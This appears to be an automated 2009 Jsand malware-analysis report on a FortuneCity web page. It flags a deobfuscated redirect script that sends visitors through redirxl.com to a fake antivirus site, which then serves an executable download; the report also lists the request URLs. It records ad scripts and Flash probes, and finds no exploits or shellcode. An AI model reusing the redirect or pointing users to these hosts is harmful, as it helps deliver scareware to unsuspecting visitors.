Analysis report for http://cropperddi.fortunecity.com/6766.html
Sample Overview
| URL | http://cropperddi.fortunecity.com/6766.html |
|---|---|
| MD5 | fa5c5fea775ed795a7f6bdd131ec5c86 |
| Analysis Started | 2009-04-24 09:06:43 |
| Report Generated | 2009-04-24 09:07:11 |
| Jsand version | 1.03.02 |
Detection results
| Detector | Result |
|---|---|
| Jsand 1.03.02 | suspicious |
Warning:
- The analyzed resource uses an unknown script language (unspecified/VBScript)
- The analyzed resource uses too much memory.
- The analyzed resource contains one or more syntax errors.
This may affect the detection of malicious code.
Exploits
No exploits were identified.Deobfuscation results
Evals
- (repeated 1 time)
g = "http://redirxl.com/filt/in.cgi?5&group=5q"; window.location = g;
- (repeated 1 time)
w.resizeTo(x * 10, x * 11 - 7)
- (repeated 1 time)
window.attachEvent('onunload', ext);
- (repeated 1 time)
window.showModalDialog(popURL, '', popDialogOptions)
Writes
- (repeated 1 time)
<script language="JavaScript">var zflag_nid = "895"; var zflag_cid = "23/22"; var zflag_sid = "1"; var zflag_width = "728"; var zflag_height = "90"; var zflag_sz = "14"; </script><script language="JavaScript" src= "http://d3.zedo.com/jsc/d3/fo.js"></script>
- (repeated 3 times)
<script language=VBScript>
- (repeated 3 times)
onerrorresumenext - (repeated 3 times)
a0 = IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.5"))
- (repeated 3 times)
if (a0 <= 0)thena0 = IsObject(CreateObject("ShockwaveFlash.ShockwaveFlash.4"))
- (repeated 3 times)
</script> - (repeated 1 time)
<script language="JavaScript" src= "http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=14&q=&s=1&z=0.9510209056020588"> </script>
- (repeated 2 times)
<script type="text/javascript">
- (repeated 2 times)
google_ad_client = "pub-1479578193153787";
- (repeated 1 time)
google_ad_slot = "8280529791";
- (repeated 2 times)
google_ad_width = 728;
- (repeated 1 time)
google_ad_height = 90;
- (repeated 2 times)
</script> - (repeated 2 times)
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
- (repeated 1 time)
<iframe SRC="http://d13.zedo.com/jsc//zpu.html?f=;z=2-103" width=0 height=0 frameborder=0 style= "position:absolute;border:0px;"></iframe>
- (repeated 1 time)
<script language="JavaScript">var zflag_nid = "895"; var zflag_cid = "23/22"; var zflag_sid = "1"; var zflag_width = "728"; var zflag_height = "15"; var zflag_sz = "18"; </script><script language="JavaScript" src= "http://d3.zedo.com/jsc/d3/fo.js"></script>
- (repeated 1 time)
<script language="JavaScript" src= "http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=18&q=&s=1&z=0.9463957649755115"> </script>
- (repeated 1 time)
google_ad_slot = "7230665922";
- (repeated 1 time)
google_ad_height = 15;
Network Activity
Requests
| URL | Status | Content Type |
|---|---|---|
| http://cropperddi.fortunecity.com/6766.html | 200 | text/html |
| http://www.fortunecity.com/js/adscript.global.js | 200 | text/javascript |
| http://d3.zedo.com/jsc/d3/fo.js | 200 | text/javascript |
| http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=14&q=&s=1&z=0.9510209056020588 | 200 | text/javascript |
| http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 | text/javascript |
| about:blank | 200 | text/html |
| http://d7.zedo.com/bar/v15-101/d3/jsc/fm.js?c=23/22&f=&n=895&r=1&d=18&q=&s=1&z=0.9463957649755115 | 200 | text/javascript |
| http://cropperddi.fortunecity.com/menu.js | 200 | text/javascript |
| http://redirxl.com/filt/in.cgi?5&group=5q | 302 | text/html |
| http://antivir-scan-pro-best.com/11038/3/ | 200 | text/html |
| http://antivir-scan-pro-best.com/landing/sp/3/images/jquery00.js | 200 | text/javascript |
| http://antivir-scan-pro-best.com/landing/sp/3/images/jquery-i.js | 200 | text/javascript |
| http://antivir-scan-pro-best.com/landing/sp/3/images/flist000.js | 200 | text/javascript |
| http://files.load-archive-av-pro.com/normal/setup_11038_3_1.exe | 200 | application/x-msdos-program |
Redirects
| From | To |
|---|---|
| http://redirxl.com/filt/in.cgi?5&group=5q | http://antivir-scan-pro-best.com/11038/3/ |
ActiveX controls
-
6BF52A52-394A-11D3-B153-00C04F79FAA6 Name Value Count Attributes jQuery1240589210527 136.0
1 -
ShockwaveFlash.ShockwaveFlash.7 Name Arg0 Count Methods GetVariable $version
2
Shellcode and Malware
No shellcode was identified.
No additional malware was retrieved.